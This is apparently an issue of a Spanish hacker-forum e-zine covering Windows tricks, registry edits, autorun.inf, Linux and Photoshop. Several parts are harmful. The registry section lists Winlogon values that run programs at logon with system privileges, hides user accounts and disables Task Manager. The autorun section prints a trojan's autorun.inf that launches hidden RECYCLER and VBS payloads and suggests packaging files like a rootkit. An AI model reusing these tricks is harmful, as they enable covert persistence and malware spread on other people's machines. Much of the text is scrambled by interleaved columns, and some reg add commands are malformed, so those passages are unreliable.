CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Variables de le sistema
Windows maneja unas variables, tales como son: el
nombre del equipo, directorio del sistema, sistema
operativo…, el truco es este

Infosistema.bat
set>c:\informacion.txt

sisteminfo>>c:\información.txt

net view >>c:\información.txt

ipconfig all>>c:\informacion.txt

type c:\informacion.txt |more

Existen muchos comandos que podríamos implementar


para obtener información, De esta forma en el directorio
raíz tendremos un archivo llamado información.txt que
contendrá información valiosa sobre el computador.

Programas especiales
En Windows existen una serie archivos (que a la vez son
programas) que nos sirven para realizar tareas, tanto de
configuración, recuperación, o administración,
accesibilidad, y muchas cosas mas, por lo general,
nosotros los usamos accediendo desde los accesos
directos, pero todos ellos son archivos ejecutables, en la
mayoría de los casos.

Ejemplos palpables de ello son los muy usados archivos Otra de las cosas importantes de Windows es su sistema
mmc.exe, msconfig.exe, gpedit.msc, charmap.exe, y por de búsqueda, permitiéndonos hacer búsquedas complejas
nombrar solo unos pocos y su carpeta de origen casi pero a la vez con un criterio fácil de seguir, por ejemplo,
siempre es: C:\windows\system32 podemos buscar imágenes solamente, archivos ocultos y
del sistema, con un criterio de fecha en particular, en fin
es fácil de usar, solo hay que ser un poco intuitivo, de más
esta decir es una herramienta imprescindible, otra cosa
importante es el uso de los comodines -> “*” “?”, el
asterisco remplaza una letra o varias letras de la
búsqueda, por decir queremos encontrar solo los archivos
ejecutables del sistema, vamos a inicio->ejecutar-> allí
escribimos c:\windows\system32 y seleccionamos la
opción buscar:

Escogemos la opción todos los archivos


CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Y allí definimos la búsqueda de la siguiente manera Æ


*.exe o *.msc o ????pad.exe , en fin…
Otro programa que me fascina y me ha salvado de
Otra herramienta que tenemos que aprender a usar muchas es el rstrui.exe en otras palabras Restaurar
constantemente es: El Administrador de Tareas, Sistema, ubicada en la carpeta:
taskmgr.exe, Esta si que es importante para el manejo C:\WINDOWS\system32\Restore este programa es el
eficiente de los recursos, desde allí podemos ver encargado de restaurar el sistema a un punto de previo
procesos, matar procesos, ver las aplicaciones en uso, de control
analizar el uso de la red y del procesador, todas ellas
tareítas que son muy importantes estar checando
regularmente. Para acceder a ella podemos hacerlo asi:
Ctrl + Alt + Supr, también escribiendo taskmgr en la
ventana ejecutar, o haciendo clic derecho sobre la barra
de tareas

Claro que el manejo de esta herramienta necesita un


apartado especial y solo hago una referencia no mas, en
otro capitulo aprenderemos a usarlo eficientemente. Por
el momento eso es todo amigos, espero les hayan gustado
el articulo.
CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

El Registro de Windows XP By Alesteir


Este documento explica, lo que es el registro y la forma igual forma cada valor tiene un nombre; y guarda algun
de manipularlo y por ello hacer lo se nos antoje con el tipo de valor información
SO Windows XP, (En próximos números del zine,
explicaremos como hacerlo con otras versiones del Las Claves
Windows) 1. HKEY_CLASES_ROOT: Contiene la información sobre
las programas y la forma en que se encuentran
Primero que todo debemos saber que el registro de asociados con las extensiones del S.O.
Windows es una gran base de datos que contiene datos
sobre los programas instalados en el PC y sus respectivas 2. HKEY_CURRENT_USER: Contiene la información de
opciones de configuración. Allí se almacena la cada programa como pueden ser:, traducciones, sonidos,
información de cada uno de los dispositivos instalados en también contiene toda la información sobre el panel de
el computador. Toda esta información se encuentra control, las conexiones a Internet y sus respectivos
estructurada de una manera jerárquica, similar a la nombres, los últimos programas y archivos utilizados,
estructura de directorios y archivos. Para modificarlo direcciones de correo electrónico y un largo etc. También
existe varias maneras de hacerlo, la mas sencilla y están almacenados los nombres de los directorios y
común es desde el editor de registro (regedit). El registro archivos necesarios para ejecutar cualquier aplicación.
es uno de los puntos críticos del sistema operativo
3. HKEY_LOCAL_MACHINE: En esta clave encontramos
windows, por ello es necesario conocer su funcionamiento
Información sobre los controladores necesarios y los
y la forma en que lo podemos manipular o modificar.
utilizados, el tipo de hardware usado o reconocido,
También cabe decir que debemos tener cuidado don lo
también contiene la información sobre los puertos.
que hagamos con el ya que podríamos dañar totalmente
el sistema operativo, por eso antes de manipular 4. HKEY_USER: Aquí esta dodo lo relativo a los datos
cualquier cosa del registro, yo recomiendo hacer un sobre cada usuario. Cada vez que un usuario diferente
backup,, como lo hacemos?, sencilloÆvamos al menú utiliza el PC, sus configuraciones se guardan en esta
inicio Æ ejecutar Æ regedit Æ Exportar y ubicamos el clave.
archivo resultante en un lugar de fácil acceso. Podemos
guardar una parte (rama) o todo el registro, para ello nos 5 .HKEY_CURRENT_CONFIG: Aquí encontramos los
posicionamos sobre la rama que deseamos guardar, es el datos de los Plug-ins utilizados por los programas,
caso de la imagen: MI PC , lo guardaría todo. Los contiene todos lo nombres y especificaciones de cada uno
archivos del registro llevan la extensión .reg y si hacemos de los periféricos.
click sobre ellos copian al registro toda la información
contenida en su interior.

Toda la información del registro esta estructurada de


manera jerárquica, de la misma forma en que están
estructura dos los directorios y archivos del sistema
operativo. Clave es el nombre que se la da las carpetas, a En la próxima entrega vernos mas sobre el registro y la
su vez cada clave tiene muchas subclaves y así forma en que lo manejamos, por el momento voy a dejar
sucesivamente, hasta llegar al valor en específico, de una recopilación de los valores que nos pueden ayudar
en cuanto a hack se refiere.
CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

Valores del registro “hackeables”


Esta es un recopilación de valores que nos pueden ayudar enormemente, es obvio que es solo para los mas avanzados en
este tema, cuidado!, ya os he advertido (Mucho ojo al manipular el registro)

Sustituir la pantalla de bienvenida

HKEY_LOCAL_MACHINE\-Software\Microsoft\Windows NT\CurrentVersion\Winlogon Æ valor alfanumérico GinaDLL


El contenido será el nombre de la librería que se usa por defecto y es: «msgina.dll
Especificar archivos ejecutados por Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ævalor alfanumérico ex System,
cuyo contenido tendrá la ruta de los archivos que se ejecutarán al inicio de sesión con privilegios de sistema.
Excluir un programa de Inicio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation valor alfanumérico
AddRemoveApps, contiene los nombres de los ejecutables, de los programas que no deseamos en el menú de Inicio, seguido
de un punto y coma «;» ÆCerramos sesión!
Pulsar «Ctrl+Alt+Supr» para iniciar la sesión
HKEY_LOCAL_MACHINE\-SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Æ valor DWORD DisableCAD
«0» activa , «1» desactiva
Ocultar el reloj de la Barra de tareas
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Æ valor DWORD HideClock,
«0» muestra el reloj o «1» lo oculta.
Esconder cuentas de usuario de la pantalla de bienvenida
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Æ
valor DWORD cuyo contenido será el nombre de usuario y su contenido «0», Æreiniciamos!
Cuenta de administrador en la pantalla de bienvenida
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Æ
valor DWORD, su nombre será «administrador, el contenido será «1» activa «0» desactivaÆreiniciamos!
Incluir Comandos al inicio del Interprete de Comandos Shell D.O.S.
HKEY_CURRENT_USER \software\microsoft\Command Processor Æ valor DWORD Autorun su contenido sera la ruta y el
nombre del programa, o el comando DOS que se ejecutara al cargar el cmd.exe ( interprete de comandos<->Shell) se
pueden introducir varios valores, solo es cuestión de separarlos por "&&" (Sin Comillas) prompt $d $t $p Listo! $_ &&
SYSTEMINFO >C:\INFO.TXT".
Deshabilitar el interprete de comandos del D.O.S.
H HKEY_CURRENT_USER \software\policies\microsoft\windows\system Æ valor Alfanumerico DisableCMD “0”
deshabilita “1” habilita la shell
Desactiva la opcion de agregar o quitar programas del Panel de control
HKEY_CURRENT_USER \software\microsoft\windows\CurrentVersion\Policies\Uninstall Æ valor Alfanumerico
NoAddRemovePrograms 0 desactiva 1 activa
Deshabilitar el Administrador de tareas
HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\policies\system Æ valor Alfanumerico
disabletaskmgr 0 deshabilita 1 habilita el administrator de tareas.
Habilitar opción de Borrar la lista de documentos recientes
HKEY_CURRENT_USER \software\\microsoft\windows\CurrentVersion\policies\explorer Æ valor Alfanumerico
ClearRecentDocsOnExit 00,00,00,00 deshabilita y 01,00,00,00 habilita
CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

Varios claves para optimizar el Windows !!!

En esta parte voy a poner una serie de claves que optimizan eficientemente nuestro sistema, las podemos guardar como un
archivo bat y ejecutarlas todas de una o simplemente mofificar la clave que deseemos!

OPTsystem.bat By Me Æ pruébenlo y me dicen! ;)


reg add "HKCU\Control Panel\Desktop\ /v WaitToKillAppTimeOut" /d 4000 /f
reg add "HKLM\system\CurrentControlSet\control /v WaitToKillAppTimeOut" /d /4000 /f
reg add "HKLM\system\CurrentControlSet\control /v WaitToKillServiceTimeout /d /4000 /f
reg add "HKLM\system\CurrentControlSet\control\Session Manager\Memory Management\PrefetchParameters" /v
EnablePrefetcher /d 5 /f
reg add "HKLM\software\microsoft\windows\CurrentVersion\explorer /v AlwaysUnloadDll" /d 1 /f

Después de correr el bat vamos a la carperta prefetch y borremos todo los archivos allí ubicados y reiniciamos

Ootro truquito para aligerar el cierre y apertura de Windows es: ubicados dentro el editor del y posicionados sobre la clave
principal MI PC y en el menú edición (o CTRL+B) escribimos la palabra kill, esto nos mostrara claves tales como waitotkill…
o algo por el estilo, cambiamos el contenido por defecto del valor que es 20000 por 4000 oprimimos f3 y hacemos lo
mismo con todas las claves que empiecen waittokill… y listo reiniciamos de nuevo para ver esos cambios (con coronometro
en mano), asi como estas cosas hyay una cantidad de cosas que puerden ser utilizadas para una mejor untilizacion de los
procesos, servicios y casi todo lo referente a este criticado pero genial sistema operativo.

Eso es todo en cuanto al registro por esta ocasión espero que lo estudien y aprendan toda la potencialidad que nos da
manipular el registro de Windows, suerte a todos!
CUH e-zine vol #1 - 1ª edición Función Autorun

Función Autorun Editorial


asociada para el, además de que puede añadir
comandos adicionales al menú emergente que aparece
cuando hacemos doble clic a la unidad en particular.
Cada vez que una unidad es detectada, el sistema
operativo registra en busca de la existencia de el archivo
Autorun.inf (El archivo debe estar ubicado siempre en el
directorio raíz). si lo encuentra ejecuta la secuencia de
parámetros internos del autoejecutable; si no encuentra el
archivo el S.O. se refiere al nuevo disco por su nombre
Autorun.inf es un archivo asociado a una función interna por defecto y ejecuta las acciones asociadas y
Autorun (Funciona elementalmente bajo Windows y corre predefinidas con la función Autorun, tal como mostrar el
sobre otros sistemas operativos) cuya principal finalidad menú emergente, etc; a mi me recuerda al viejo y aun
es ejecutar una secuencia de comandos o parámetros que utilizado autoexec.bat (en cuanto a su característica
son ejecutados por el sistema operativo línea por línea, básica y principal -ejecutarse automáticamente-), aquellos
pudiendo: cambiar el icono de la unidad que lo contiene, que lo han usado saben de que les hablo.
correr un ejecutable, abrir un archivo con la aplicación

Resumiendo un poco, la función Autorun define lo siguiente:

El proceso o la aplicación que se ejecutara automáticamente cuando una nueva unidad es detectada.

Opcionalmente se puede definir que corra sobre un determinado ambiente operativo.

Un icono que será visualizado en el Explorador de archivos o en Mi PC representara a la unidad en particular.

Una Ventana emergente O Menú de opciones desplegado cuando hacemos clic derecho sobre la unidad.

La función de auto arranque funciona con cualquier unidad de disco: CD, DVD, dispositivos de almacenamiento vía USB,
Discos duros, y Unidades Zip, que contenga un archivo autorun.inf ubicado siempre en el directorio raíz, cabe recalcar que
por defecto esta función esta desactivada para unidades que no sea CD-ROM1.

Como lo creamos?
Es muy fácil, simplemente abrimos editor de texto plano como wordpad o el bloc de notas -->inicio--
>ejecutarÆnotepad.exe1y simplemente definimos los parámetros que comandos que se adapten a nuestras necesidades, lo
guardamos en la unidad (USB, CD-RW, DVD-RW, Discos locales, etc) como Autorun.inf , si no sabemos usar los CDs
regrabables, pues preparamos todo el paquete (Tal como un rootkit) en una carpeta a la mano y quemamos todo en un cd,
teniendo muy en cuenta las rutas que usaras o simplemente grabando todo en el directorio raíz. Yo uso mucho esta función ,
para crear Cds bien sea: totalmente autónomos, o que interactúen con el usuario (Especial para Tutoriales o Programas)
CUH e-zine vol #1 - 1ª edición Función Autorun

Parámetros o Comandos:

Parametro Sintaxis Ejemplo

Icon icon=[ruta\]nombreicono[,index] icon=ejecutable.exe,1 ; icon=1.ico

Label - label=NombreUnidad label=CUH e-Zine

Etiqueta

Open-Abrir open=[ruta\]ejecutable [param1 [param2] ...] open=AutoArranque.exe

Shellexecute shellexecute=[filepath\]filename[param1,[param2]...] shellexecute=Escanear.exe

Shell\verb shell\verb\command=NombreArchivo.exe shell\install\command=start


instalar.exe

Shell shell\verb=TextoMenu shell\uninstall = &Desinstalar


2

Menú Emergente
CUH e-zine vol #1 - 1ª edición Función Autorun

Ejemplos de cómo hacer un autorun.inf

CUH e-Zine Sample Soundmix- Troyano Agent32

[ Autorun] open=

Label=CUH e-Zine shell\open=´ò¿ª(&O)

icon=icono.ico shell\open\Command=RECYCLER\autorun.exe -OpenCurDir

open=autorun.exe shell\open\Default=1

action=Escanear dispositivo shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)

shellexecute=escanear.exe shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir

shell\comprobar=&Comprobar Troyano wscript


shell\ Comprobar\Command=comprobar.exe
autorun·ç±©

shell\install = &Instalar
[autorun]

shell\install\command = start Instalar.exe


open=
3
shell\uninstall = &Desinstalar
shell\open=´ò¿ª(&O)

shell\uninstall\command = start Desinstalar.exe


shell\open\Command=WScript.exe .\autorun.vbs

shell\readme = &Leeme
shell\open\Default=1

shell\readme\command =start notepad readme.txt


shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)

shell\help = &Help shell\help\command = start


shell\explore\Command=WScript.exe .\autorun.vbs

ayuda.hlp

Mas informacion:

http://www.fermu.com/content/view/356/26/lang,es/

http://mundogeek.net/archivos/2006/04/10/dispositivos-usb-y-autoruninf/
CUH e-zine vol #1 - 1ª edición GNU - LINUX

GNU/Linux by LTSmash

¿Que es Linux? Bien, pero, ¿Cuáles son las características?


Hola amigos. Hay una cosa en el mundo que muchos Linux es software Libre, es un clónico del sistema UNIX
ignoran, y eso es la existencia de alternativas a Microsoft. (aunque en realidad estaba basado primariamente en
Microsoft es una empresa dedicada a la informática pero MINIX) y fue escrito quizá como un ejercicio/pasatiempo o
esto no implica que sea una empresa buena ni decente; sin simplemente para hacer un SO por su creador: Linus
embargo hay un producto suyo que esta presente en la Torvalds.
mayoría de los ordenadores del mundo, y se llama
WINDOWS. Windows es el “Sistema operativo” (hay
quienes dicen que no cumple los requisitos para ser ¿Pero exactamente qué significa eso de Libre y qué
catalogado como tal) mas usado en el mundo, y ventajas tiene?
actualmente la mayoría de las personas que manejan un
ordenador por consecuencia trabajan con el mismo. Hay
otros sistemas como MacOS de Apple, BSD el UNIX libre, Significa lo que mencione con anterioridad. El software
Solaris de Sun Micro; incluso algunos otros sistemas ya libre tiene básicamente cuatro puntos/libertades que lo
muertos (OS/2 de IBM, DR-DOS de Digital Research, MS- definen como tal:
DOS de Microsoft y un largo etcétera), incluso sistemas
mucho menos conocidos que los anteriores como son Ejecutar el programa con cualquier propósito (privado,
ReactOS (la implementación libre de Windows NT) y educativo, público, comercial, militar, etc.)
FreeDOS (una implementación libre de DOS).
Sin embargo, no son otros sistemas los que nos interesan, Eso incluye la posibilidad de usarlo para aventar una
sino el único y real, verdadero y tangible competidor de bomba nuclear al pentágono y no es una broma.
Windows: GNU/Linux.
GNU/Linux es un sistema operativo de carácter libre, es Estudiar y modificar el programa (para lo cual es necesario
decir, software que controla el funcionamiento apropiado poder acceder al código fuente)
del ordenador bajo una licencia permisiva donde se tiene
acceso a varias libertades que con el software privativo Asi que tenemos acceso a la receta del software y podemos
seria imposible tener, como el código fuente (“source code” usarla para mejorar nuestra habilidad “programando”
en ingles) que en esencia seria la “receta” del software, y la (haciendo recetas de software).
libertad de distribuirlo y usarlo como prefiramos (dentro de
la normatividad de la licencia). En el caso de Linux (el Copiar el programa de manera que se pueda ayudar al
kernel/núcleo que es el nivel de software que controla la vecino o a cualquiera
interacción entre las aplicaciones y el hardware), se usa la
licencia GPLv2 de la FSF (Free Software Fundation) que es Asi es, si queremos se lo copiamos a todo el mundo y no
la máxima casa del software libre fundada por Richard será esto ilegal, ¡NO MAS WAREZ!
Stallman.
Mejorar el programa y publicar las mejoras

Colaboramos con la comunidad si así lo deseamos, de esta


forma el software libre esta en continuo desarrollo y es por
ello que es un modelo progresista.
CUH e-zine vol #1 - 1ª edición GNU - LINUX

¿Pero entonces por qué este genial sistema operativo las demás: Slackware (la mas antigua con vida), Debian
no es ya líder mundial? (padre de la mas usada que es Ubuntu), RedHat (la distro
empresarial y comercial mas usada) y Gentoo (una
metadistro, es decir, se reparte no de forma
binaria/lenguaje-entendible-para-la-PC sino en modo de
código fuente listo para ser traducido a código maquina).
Hay miles de distros, y quizá sea muy difícil entrar a
escoger una así que quizá quieras probar con algo como
Ubuntu, la distro mas popular del momento y que es muy
usada por ser simple y eficiente.

¿Cómo se "estructura" Linux?


Linux es software, y no hay detrás de Linux una empresa
MONOPOLICA (léase Microsoft) que haga FUD (FUD, del Linux, lo que se llama principalmente LINUX, es el kernel o
inglés, Fear, Uncertainty and Doubt, «miedo, incertidumbre núcleo, y de ahí se gestiona la comunicación entre software
y duda» es una expresión con la que se califica a una y hardware. Linux trabaja en cuestión algo diferente con lo
determinada estrategia comercial consistente en diseminar que es el kernel, ya que el kernel puede incluir en si mismo
información negativa, vaga o sesgada con el objeto de los controladores o llamarlos externamente. Linux entonces
perjudicar a un competidor, después de 1991 el término se tiene un excelente reconocimiento de software en las distros
ha generalizado para referirse a cualquier clase de binarias ya que están hechas para que tenga soporte con
desinformación usada como un arma competitiva.) y varios tipos de hardware. Así mismo, si lo preferimos,
marketing por el, así que el poder de la publicidad puede podemos compilar un kernel a la medida que solo soporte
mas que el de la comunidad hasta ahora. Sin embargo, hay el hardware que le indiquemos y que este optimizado para
una gran cantidad de empresas que viven del software libre nuestra maquina, de modo que solo trabaje en ella y
(si, así es, ya sea dando soporte, desarrollando mas aumentando el rendimiento.
software como RedHat, Novell, Linspire, etc.; o incluso Linux tiene lo que llamamos “daemons”. Un demonio,
vendiendo Cds, pendrives y DVDs con SL) y ayudan mucho daemon ó dæmon es un tipo especial de proceso
a probar que el software libre y Linux son rentables y con informático que se ejecuta en segundo plano en vez de ser
esto su difusión se incrementa. controlado directamente por el usuario (es un proceso no
interactivo).Así pues, nuestro sistema trabaja con varios de
estos y trabajara con mas según se le indique que así sea,
facilitando cosas como el ser multiusuario (podemos
¿Cómo se distribuye Linux?
configurar nuestro equipo para acceder desde otro sin la
Linux se distribuye además particularmente en lo que intervención de otro usuario, ni interrumpirle), podemos
llamamos “distribuciones” o distros, que no son sino ordenarle que ejecute determinadas tareas cuando se le
compilaciones de software para tener un sistema operativo pida, etc.
completo y funcionar, lo normal es que incluyan un sistema
grafico (GUI, es lo que vemos en la pantalla como nuestro
escritorio y los iconos), suites de ofimática completas (como
OpenOffice.org), aplicaciones multimedia (reproductores
de video y audio), incluso juegos. Las distros se clasifican
ya sea dentro de lo general y lo especifico/especializado,
es decir, distros que son hechas para que cualquiera las
use o distros que están hechas para que, por ejemplo, se
adapten a las necesidades de un músico (el caso de Musix).
Hay cuatro distros actuales de donde surge la mayoría de

¿Y que tal luce Linux?


Linux luce como tú quieras que luzca. En términos generales, en un sistema Linux es muy común encontrar tres entornos de
escritorio (Un entorno de escritorio, en inglés Desktop Environment es un conjunto de software para ofrecer al usuario de un
ordenador un ambiente amigable y cómodo y es una solución completa de interfaz grafica de usuario o GUI, ofrece iconos,
barras de herramientas, programas e integración entre aplicaciones con habilidades como, arrastrar y soltar.) principales, que
son KDE, GNOME y XFCE.
CUH e-zine vol #1 - 1ª edición GNU - LINUX

KDE GNOME Xfce

Y eso no es todo, no, por que podemos añadir widgets que son mini aplicaciones que se agregan a nuestro escritorio, como
relojes y verificador de recursos del sistema en uso; incluso disponemos de Beryl y su nueva fusión con Compiz que es Compiz-
Fusion que da efectos superiores a los de cualquier otro S.O.:

Compiz-Fusion

actualizarse (con la excepción del Kernel), Linux no necesita


¿Y la seguridad? ¿Que tan seguro es GNU/Linux? actualizar cada programa manualmente, Linux no necesita
antivirus ni antispyware. Linux es tan potente, que se le
puede dar cualquier uso, desde un escritorio hogareño,
La gente con el paso del tiempo se ha acostumbrado a pasando por centro multimedia hasta servidor web;
constantes fallos, a que un ordenador sea vulnerable a INCLUSO SE USA EN HOLLYWOOD PARA LA EDICION
virus, que no sea estable, que haya que reiniciar para DE PELICULAS.
actualizarse y que esto no nos de ningún beneficio, que la Concluyendo...
PC se ralentice con el tiempo, incluso al instalar un Linux es la solución viable para liberarnos de un
programa, acostumbrados a usar un antivirus y un monopolio, de sus restricciones, de que se nos manipule.
antispyware que desgraciadamente no les protege del todo Debemos detener al monstruo y ser libres. Tenemos las
pero que les cuesta dinero y recursos del sistema. Están herramientas, ¡HAGAMOSLO!
acostumbrados a la poca madurez del software.
Linux no puede cumplir con las expectativas,
lamentablemente, ya que es un sistema muy estable, flexible
y bien probado, que progresa con el tiempo: Linux no se
ralentiza con el tiempo, Linux no necesita reiniciar para
CUH e-zine vol #1 - 1ª edición GNU - LINUX

programó la mayoría de de las líneas de código 
del  kernell  este  genial  y  eficaz  sistema 
operativo llamado LINUX. 
 
Primer  mensaje  que  Linus  Torvalds  mando  al 
Por LTSmash grupo de noticias comp.os.minix: 
 
  From:torvalds@klaava.Helsinki.FI  (Linus 
  Benedict Torvalds) 
GNU   Newsgroup: comp.os.minix 
Subject: GCC‐1.40 and a posix question 
Los  sistemas  GNU  Linux  son  utilizados  en 
muchos  lugares,  que  van  desde  los  escritorios  Message‐ID:  1991Jul13, 
hasta  sistemas  de  misión  critica  en  grandes  100050.9886@klaava.Helsinki.FI 
empresas y/o instancias gubernamentales   Date: 3 Jul 91 10:00:50 GMT 
Linux  te  da  la    libertad  no  como  gratuidad. 
Dicha  libertad  se  refiere  a  que  podemos 
correr,  leer  y  escribir  el  software.  Esto  es, 
que  cuando  obtienes  un  programa,  no  solo 
obtienes  el  binario,  sino  que  también  puedes  Nota Editorial
obtener el código fuente, el cual puedes leer, 
modificar  e  incluso  distribuir  sin  ningún 
problema legal.  

 
LINUX  es  un  sistema  operativo,  compatible  con  
Unix.  Dos  características  muy  peculiares  lo 
diferencian  del  resto  de  los  sistemas  que 
podemos  encontrar  en  el  mercado,  la  primera, 
es que es libre, esto significa que no tenemos 
que  pagar  ningún  tipo  de  licencia  a  ninguna 
casa desarrolladora de software por el uso del 
mismo,  la  segunda,  es  que  el  sistema  viene 
acompañado  del  código  fuente.  El  sistema  lo 
forman  el  núcleo  del  sistema  (kernel)  mas  un 
gran numero de programas / librerías que hacen 
posible su utilización. 
 
‐‐‐‐‐ o ‐‐‐‐ 
 
Linus  Torvalds,  la  persona  de  la  que  empezó 
todo  este proyecto, en el año 1991, por aquel 
entonces,  el  era  un  estudiante  de  informática 
de  la  Universidad  de  Helsinki,  todo  empezó 
como  una  obsesión  personal  el  fue  el  que 
CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Usando el Photoshop e Imageready By Alesteir


En esta sección DISEÑO GRAFICO por el momento vamos nos desempeñamos en el diseño en general). Son pocos
a trabajar con un programa(en realidad son dos)) en los calificativos que se le pueden dar a este genial
particular su nombre es Photoshop (maneja diseños programa, siendo usado en casi todos los rincones del
estáticos) e Imageready (manejo de animaciones) para los mundo, a algunos tal vez se les dificulte al principio y tal
que manejáis este programa , pues esta articulo puede vez terminen catalogándolo como un programa mas, pero
parecer uno mas, pero lo que se intenta es introducir a no es así. Yo me puedo atrever a decir que photoshop es
principiantes pero también incluimos buenos trucos para uno de los diez mejores programas informáticos de todos
usuarios intermedios y avanzados, como esta es la primera los tiempos, y es que a medida que uno va aprendiendo a
edición del zine, empezaremos con los conceptos básicos, manejar y a combinar todas las herramientas es cuando se
componentes mas utilizados, atajos de teclado (shortcuts) , da cuenta del potencial y versatilidad que posee. Bueno,
configuración, y muchos trucos que nos ayudara a no mas bla,bla,bla, y a lo que vinimos! (Para Windows
efectuar nuestros diseños de una forma mas eficiente y solamente, esperamos implementarlo a Mac en próximas
rápida (Incluso aumentando nuestra competitividad ediciones )
laboral, dado el hecho de que

Instalar dos versiones


Pues para esta edición vamos a r una de las versiones Fig. 2
básicas como es el Photohop 7.0, además de ser el que
mas me gusta usar -claro que se pueden tener
instaladas dos versiones en un mismo sistema operativo
(Ver imagenes 1 y 2), si algunos lo saben pues… y si no
pues…, empecemos con un truquito, si tienes instalado
ya algún programa y quieres tener otra versión pues
simplemente la instalas y a la hora de elegir la carpeta
destino para los archivos cambias el nombre y la
ubicación de la carpeta, pero recuerden que no
podemos abrir las dos versiones del programa a la
vez (aplicable a cualquier aplicacion).

Fig. 1

Los primeros pasos


Lo primero que debemos aprender: es saber abrir un tamaños , dependiendo de nuestras necesidades, pero lo
nuevo archivo (Ctrl+N), veamos la figura de abajo, 1 nos realmente practico es lo siguiente, existe la opción
indica que que abrimos un nuevo psd(Llamase al personalizar, una vez hayamos definido nuestras
documento hecho en photoshop que preserva todas las preferencias, podemos guardar todo asignándole un
características del diseño, como capas, estilos, etc), 2 el nombre y listo queda como un documento predeterminado,
nombre del archivo, es mejor definirlo desde aquí, 3 este (supongamos que hacemos nuestra firma con las mismas
es el nombre predefinido para el documento, al características: 300x100 px, transparente, 72 ppi, etc.). 4
seleccionar esta opción, nos sale un menú n con distintos Indica el tipo de medida que vamos a manejar: Pixeles,
CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

pulgadas, cm, mm, etc. 5 Esto se refiere a la cantidad de pudiendo ser: Mapa de bits, Escala de grises, Color RGB,
pixeles por pulgada PPI de resolución del documento. 6 etc. 7 En esta parte definimos el color del fondo:
Aquí escogemos el modo de color del documento, transparente, blanco, o color de fondo.

Componentes de Photoshop

Nuestro espacio de trabajo, esta compuesto por ventanas, allí lo podemos hacer simplemente arrastrando la barra
barras de herramientas, menús y el panel de (1), o clicando sobre los triangulitos (2) )Una es, pulsando
herramientas, por defecto se ubican las ventanas a la la tecla Tab (esconde todo), la otra es Shift + Tab (deja
derecha de la pantalla, el panel de herramientas al solo el panel), también hay un truquito, que os voy a
izquierdo y las barras en la parte superior (Horizontales); enseñar, en el menú ventana, la primera opción nos
algunas veces vamos a necesitar tener nuestro espacio de permite definir un espacio adecuado a nuestras
trabajo libre de ventanas,(en photoshop podemos hacer necesidades o a un tamaño en especifico, por ejemplo:
las cosas de distintas maneras: 1. Accediendo a los menús para usar un diseño tipo banner necesitaremos poner las
2. usando los atajos de teclado, 3. desde las ventanas, ventanas en la parte superior de forma que no nos estorbe
claro que no todas las opciones están disponibles para al hacer un zoom ver Fig. 6, yo lo llamo 222 (Zoom al
ello, pero muchas si, por ejemplo para hacer un zoom, 222,55 %) ver Fig. 5, seleccionamos la opción guardar
podemos usar Ctrl + + o ir a menú vista y seleccionar espacio de…
aumentar, otra es desde la ventana navegador ver Fig. 4, -
CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Fig. 5

Fig. 4

Fig.6

De igual forma photoshop permite personalizar muchas cosas, como son los menús, preferencias y incluso los atajos de
teclado, para terminar este articulo, veremos algunos shortcuts mas usados, nos vemos en la próxima edición, (recuerden que
para el próximo numero empieza lo bueno )espero que les sirva y lo disfruten, que en el fondo es lo mas importante! ;) Suerte
a todos!!! By alesteir

Atajos de teclado (Shortcuts)


CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Nuevo archivo --> Ctrl + N Editar en imageready Shift+ Ctrl+M

Abrir --> Ctrl + O Herramienta Selección A

Abrir como --> Ctrl + Alt + O Herramienta Notas N

Pegar --> Ctrl + V Herramienta Sector K

Cortar --> Ctrl + X Herramienta Mano H

Copiar --> Ctrl + C Herramienta degradado G

Combinar capas --> Ctrl + E Herramienta pluma P

Combinar capas visibles --> Ctrl+Shift+N Herramienta Borrar E

Configurar pagina --> Ctrl + Shift + P Herramienta Recortar C

Transformación libre --> Ctrl+T Herramienta Lazo L

Transformación libre --> Ctrl+TCtrl+Alt+T Herramienta Texto (Vertical / Horizontal) T

Nueva capa --> Ctrl+Shift+N Herramienta Forma U

Nueva capa (sin dialogo) --> Alt+Ctrl+Shift+N Herramienta Mover V

Menus --> Ctrl+Alt+Shift+M Herramienta Varita mágica W

Acercar --> Ctrl++ Herramienta Marco M

Alejar --> Ctrl+- Herramienta Clonar S

Niveles --> Ctrl + N Herramienta pincel B

Deshacer/rehacer --> Ctrl+Z Herramienta pincel de historia Y

Ultimo filtro --> Ctrl + F Herramienta pincel corrector J

Ver extras --> Ctrl + H Colores por defecto (B/N) D

Modo de pantalla --> F Notación sonora Shift+N

Ver reglas --> Ctrl + R Modo mascara rápida Q

F1 Help Alt+I Menu Imagen

Alt+A Menu Archivo Alt+P Menu Capas

Alt+E Menu Edicion Alt+S Menu Seleccion

Alt+U Ayuda Alt+F Menu Filtro

Alt+V Menu Ventanas Alt+T Menu Ver


Desde aquí agradecemos a todos los colaboradores que han hecho esto posible , los
organizadores de la e-zine somos, gallloo y alesteir que nos enorgullecemos de la e-zine
que hemos creado entre todos.
Aquí listo a todos los colaboradores y amigos que han participado:

.::Cr4m::.
ManCuerTex (ViPeR)
ElPerro
froseck
Don nadie
furious dami
XD
JUCA
Logan_doax
elektro
|_ocutus
LTSmash

Gracias a todos por parte de todo el foro


Si tienen alguna sugerencia o quiere contactar con nosotros, puede buscarnos en:
http://foro.el-hacker.com

O mandarnos un e-mail a cualquiera de estas dos direcciones de correo:


